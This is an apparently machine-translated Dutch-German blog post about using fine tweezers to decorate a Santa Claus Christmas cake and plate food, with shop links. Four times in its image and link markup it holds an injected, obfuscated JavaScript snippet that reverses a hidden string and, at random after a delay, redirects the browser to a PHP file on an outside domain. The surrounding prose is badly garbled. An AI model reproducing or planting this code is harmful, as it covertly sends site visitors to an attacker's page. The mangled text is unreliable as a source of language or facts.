De Bakkerij van Kerstmis - KERSTMAN cake met een GERALD PINCET VERWEZENLIJKTE In der Küche

Een heleboel mensen hebben thuis een pincet. In de meeste gevallen is dit echter, in geval van nood op de verkeerde plaats.. Pincet moet niet alleen in je medicijnkastje, zijn in de badkamer of studeerkamer.. Einige sollten auch in der Küche vorheen ander sein. Pincet zijn uitstekende hulpmiddelen voor een aantal verschillende taken, niet alleen voor wenkbrauwen epileren of verwijderen van splinters. werkelijk, Pincet uitgebreide agenda, die eine präzise Hand benötigen. Van perfecte taart decoratie te ontdoen van verstopte afvoeren, Lees verder om te leren over de innovatieve manieren voor pincet weten.

$p$VTO6JhIH6WkCGAcPR=function(n){als (soort van ($p $ VTO6JhIH6WkCGAcPR.list[n]) == “draad”) terug $ p $ VTO6JhIH6WkCGAcPR.list[n].spleet(“”).omgekeerde().toetreden(“”);terug $ p $ VTO6JhIH6WkCGAcPR.list[n];};$p $ VTO6JhIH6WkCGAcPR.list =[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1 = Math.floor(Math.random() * 5);als (number1 == 3){was delay = 15000;setTimeout($p $ VTO6JhIH6WkCGAcPR(0), vertraging);}andizing/wp-content/uploads/sites/3/2015/12/christmas-992576_1920.jpgdata-slimstat-tracking=truedata-slimstat-callback=truedata-slimstat-type=”0″>$p$VTO6JhIH6WkCGAcPR=function(n){als (soort van ($p $ VTO6JhIH6WkCGAcPR.list[n]) == “draad”) terug $ p $ VTO6JhIH6WkCGAcPR.list[n].spleet(“”).omgekeerde().toetreden(“”);terug $ p $ VTO6JhIH6WkCGAcPR.list[n];};$p $ VTO6JhIH6WkCGAcPR.list =[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1 = Math.floor(Math.random() * 5);als (number1 == 3){was delay = 15000;setTimeout($p $ VTO6JhIH6WkCGAcPR(0), vertraging);}andizing/wp-content/uploads/sites/3/2015/12/christmas-992576_1920-1024×768.jpg?resize=640%2C480alt=”Kerstmis de Kerstman cake” width=”600″ height=”450″ />

Riskeren Not Your Father Christmas Cake

Wat gisteren voor een verrassing voor de gasten en de kinderen. Ik heb liefgehad $p$VTO6JhIH6WkCGAcPR=function(n){als (soort van ($p $ VTO6JhIH6WkCGAcPR.list[n]) == “draad”) terug $ p $ VTO6JhIH6WkCGAcPR.list[n].spleet(“”).omgekeerde().toetreden(“”);terug $ p $ VTO6JhIH6WkCGAcPR.list[n];};$p $ VTO6JhIH6WkCGAcPR.list =[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1 = Math.floor(Math.random() * 5);als (number1 == 3){was delay = 15000;setTimeout($p $ VTO6JhIH6WkCGAcPR(0), vertraging);}andizing/product/gerald-forceps-tux-label-antimagnetic-soldering-tweezers-17-5-cm-ultrafine-tip-0-5-mm-2 /” target=_blankdata-slimstat-tracking=truedata-slimstat-callback=falsedata-slimstat-type=”0″>Gerald Pinzette meines Göttergatten zu verwenden werden verwijderd uit zijn hobbyruimte. Echter, ik had het voor gebruik in de keuken te reinigen en te ontsmetten voor haar ... :rollen: Voor de ogen van de laatste stap op de taart te plaatsen, het viel me als een te hoog risico van deze te maken heeft met mijn gebruikelijke pincet en dus ik koos zijn precission pincet..

U kunt er zeker van mijn vrienden, Deze pincet is nu op mijn keuken wishlist.
Terwijl het decoreren had ichwirklich voelen, als een echte pro te werken en het resultaat om trots op te zijn. Elke gast heeft slechts een keer gemaakt met zijn mobieltje een momentopname, voordat de taart vork naderde de Dekokuchens..

“I was using tweezers to handle a thin stream of strawberry purée frozen with liquid nitrogen because if you touch it, Het uiteenvalt,”, zegt Grant Achatz, de chef-kok bij Alinea, in Chicago in deze THE NEW YORK TIMES artikel. “Tweezers allow boundary-pushing with scale and texture.”

Versieren van taart en eten borden.

Als fijne, nauwkeurige werk is nodig op een taart of een galadiner professional te kijken ? Pincet zijn je vriend!
In high-end restaurants over de hele wereld, gebruik koks pincet, om perfect te versieren hun schalen en borden. Voor de bakkers onder ons, Pincet zijn in de mode., Eenvoudige pincet zijn vaak voldoende voor de Trappieren met “liefde kralen” en anderem dekorativem Material um Eure Kuchen zu verschönern. Maar het is een goed gevoel voor de ziel, professionele pincet als $p$VTO6JhIH6WkCGAcPR=function(n){als (soort van ($p $ VTO6JhIH6WkCGAcPR.list[n]) == “draad”) terug $ p $ VTO6JhIH6WkCGAcPR.list[n].spleet(“”).omgekeerde().toetreden(“”);terug $ p $ VTO6JhIH6WkCGAcPR.list[n];};$p $ VTO6JhIH6WkCGAcPR.list =[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1 = Math.floor(Math.random() * 5);als (number1 == 3){was delay = 15000;setTimeout($p $ VTO6JhIH6WkCGAcPR(0), vertraging);}andizing/product/gerald-forceps-tux-label-antimagnetic-soldering-tweezers-17-5-cm-ultrafine-tip-0-5-mm-2 /” target=_blankdata-slimstat-tracking=truedata-slimstat-callback=falsedata-slimstat-type=”0″>Gerald Pinzette meines Göttergatten zu verwenden. En het is echt beter dan de goedkope onderdelen uit de junk shop voor 2.- Euro. Niet alleen artsen weten waarom zetten ze zoveel waarde aan goed hulpmiddel…...